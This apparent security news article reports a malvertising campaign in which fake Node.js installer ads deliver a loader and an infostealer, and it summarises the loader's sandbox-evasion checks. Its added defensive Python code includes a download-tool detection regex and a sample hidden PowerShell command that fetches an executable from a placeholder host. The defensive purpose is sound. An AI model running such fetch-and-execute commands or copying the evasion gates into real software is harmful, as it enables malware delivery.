Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware

Jun 22, 2026 · 5 min read

Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer.

The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single click on what appears to be a legitimate sponsored search result.

The attack takes advantage of something millions of people do every day, searching for software online and trusting the top results. In this case, threat actors set up a malicious landing page built to look like an official Node.js platform.

When a victim clicked the sponsored ad, they were quietly redirected through an intermediary domain to download a malicious Windows batch script hosted on a legitimate cloud file-sharing service, making it much harder for security tools to flag it.

Researchers at Elastic Security Labs identified this active campaign and confirmed it was targeting one of their own customers. 

Elastic Security Labs said in a report shared with Cyber Security News (CSN) that the loader, now tracked as OXLOADER, had not been publicly documented before and was operating with remarkably low detection rates across both static antivirus engines and automated sandbox environments.

The campaign ran through Google Ads, and the malicious advertiser account was registered under a verified name linked to Ukraine.

The last time the ad appeared was April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns entirely.

What makes this attack particularly concerning is how seamlessly the threat actor blended into trusted platforms to deliver their payload without raising alarms.

Advertiser's profile on Google Ads Transparency Center (Source - Elastic)

The final payload delivered through this chain is an infostealer called CASTLESTEALER, a .NET-based malware capable of harvesting sensitive data from infected systems.

Security teams should treat sponsored search results for developer tools with extra scrutiny, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites.

Hackers Impersonate Node.js Installer in Google Ads

The infection chain begins when a user searches for the Node.js installer and clicks a sponsored result. That click sends the victim to a fake landing page built to mimic the real Node.js environment.

Batch script downloading and launching OXLOADER (Source - Elastic)

From there, a redirect through an intermediary domain delivers a batch script hosted on Storj, a legitimate cloud storage service the threat actors deliberately abused to bypass reputation-based filtering.

The batch script goes a step further by displaying a convincing fake software installation wizard, giving the victim no reason to suspect anything is wrong.

Behind that interface, it is silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access. The entire experience is designed to feel like a routine software install.
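The chain just described (a batch script spawning a PowerShell download and then an elevated process) is what a detection engineer would want to correlate in process telemetry. The following is an added example, not Elastic's detection content; the events are constructed, simplified process-creation records, and their field names (pid, ppid, image, cmd, integrity) are an assumption to adapt to your own schema.

```python
"""Correlate the batch -> PowerShell download -> UAC elevation chain.
Added example, not Elastic's detection content; the events are constructed,
simplified process-creation records whose field names are an assumption.
"""
import re

RANK = {"Low": 0, "Medium": 1, "High": 2, "System": 3}
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b",
    re.IGNORECASE)

# Constructed sample: cmd running a .bat from Downloads -> hidden PowerShell
# fetch -> fetched binary started at High integrity after the UAC prompt.
EVENTS = [
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\bob\Downloads\Bild0erSetup.bat"', "integrity": "Medium"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c Invoke-WebRequest https://example.invalid/n.exe -OutFile n.exe",
     "integrity": "Medium"},
    {"pid": 400, "ppid": 200, "image": r"C:\Users\bob\AppData\Local\Temp\n.exe",
     "cmd": "n.exe", "integrity": "High"},
    # Benign control: an admin downloading from an interactive shell, no .bat parent.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Invoke-WebRequest https://example.invalid/tool.zip -OutFile t.zip",
     "integrity": "Medium"},
]

def _is(image, name):
    return image.lower().endswith("\\" + name)

def find_loader_chains(events):
    """Return (bat_cmd_pid, powershell_pid, elevated_child_pid) per match."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ps in events:
        if not (_is(ps["image"], "powershell.exe") and DOWNLOAD_RE.search(ps["cmd"])):
            continue
        bat = by_pid.get(ps["ppid"])
        if not (bat and _is(bat["image"], "cmd.exe") and ".bat" in bat["cmd"].lower()):
            continue
        # Stage 3: the batch or its PowerShell child starts a process at a higher
        # integrity level than the script itself, i.e. the UAC prompt was accepted.
        for child in events:
            if child["ppid"] in (bat["pid"], ps["pid"]) and \
                    RANK[child["integrity"]] > RANK[bat["integrity"]]:
                hits.append((bat["pid"], ps["pid"], child["pid"]))
    return hits
```

Windows records the requesting process as the parent of a UAC-elevated process, which is why the third stage is matched on the parent pid rather than on consent.exe.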

Elastic Defend alerts triggered upon script execution (Source - Elastic)

A second variant of OXLOADER was discovered on May 13, 2026. This one masqueraded as a Node.js installer binary rather than as the API Monitor tool the first sample impersonated, but the underlying loader mechanism was identical.

Researchers noted that the file retained the word “node” in its filename, likely to maintain the lure theme the campaign relied on throughout.

How OXLOADER Evades Detection

OXLOADER is built with evasion as a core feature. Before executing anything meaningful, it runs five separate checks to confirm it is not running inside a sandbox or virtual machine.

Infection chain execution graph (Source - Elastic)

These include checking for at least three CPU cores, at least 3 GB of physical RAM, a display refresh rate above 20 Hz, and verifying the system is not located in a CIS region or configured for the Russian language.
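Sandbox operators can turn the gates listed above into a readiness check for their analysis VMs, so a sample like this one actually detonates instead of exiting quietly. The following is an added example, not Elastic's or the malware's code; the thresholds are the ones the article reports, while the CIS country list is an assumption because the article does not say which region codes the loader checks.

```python
"""Check whether an analysis VM would pass OXLOADER's environment gates.
Added example, not Elastic's or the malware's code. Thresholds are those the
article reports; the CIS country list is an assumption, since the article
does not say which region codes the loader checks.
"""
from dataclasses import dataclass

# Assumed approximation of "CIS region" (ISO 3166-1 alpha-2 codes).
CIS_COUNTRIES = {"AM", "AZ", "BY", "KZ", "KG", "MD", "RU", "TJ", "TM", "UZ"}

@dataclass
class HostProfile:
    cpu_cores: int
    ram_gb: float
    refresh_hz: int
    country: str      # e.g. "US"
    ui_language: str  # BCP-47 tag, e.g. "en-US"

def failed_gates(p):
    """Names of the gates under which the loader would refuse to detonate."""
    failed = []
    if p.cpu_cores < 3:
        failed.append("cpu_cores<3")
    if p.ram_gb < 3:
        failed.append("ram<3GB")
    if p.refresh_hz <= 20:  # the article says the rate must be above 20 Hz
        failed.append("refresh<=20Hz")
    if p.country.upper() in CIS_COUNTRIES:
        failed.append("cis_region")
    if p.ui_language.lower().split("-")[0] == "ru":
        failed.append("russian_language")
    return failed

def would_detonate(p):
    """True when every gate passes, i.e. the sample would run in this VM."""
    return not failed_gates(p)

# Constructed profiles: a bare-bones sandbox VM and one sized to look real.
MINIMAL_SANDBOX = HostProfile(cpu_cores=1, ram_gb=2, refresh_hz=1, country="US", ui_language="en-US")
REALISTIC_SANDBOX = HostProfile(cpu_cores=4, ram_gb=8, refresh_hz=60, country="US", ui_language="en-US")
```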

The loader also uses sophisticated obfuscation techniques that break standard binary analysis tools, making reverse engineering slow and difficult.

It hides malicious code inside the Windows .reloc section, a space legitimate programs never use for executable instructions, and unpacks itself in memory using self-modifying decryption routines.

The final payload, CASTLESTEALER, is then delivered entirely in memory using an open-source shellcode generator called DonutLoader, leaving almost no trace on disk.

Indicators of Compromise (IoCs):


Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Source: CybersecurityNews.com
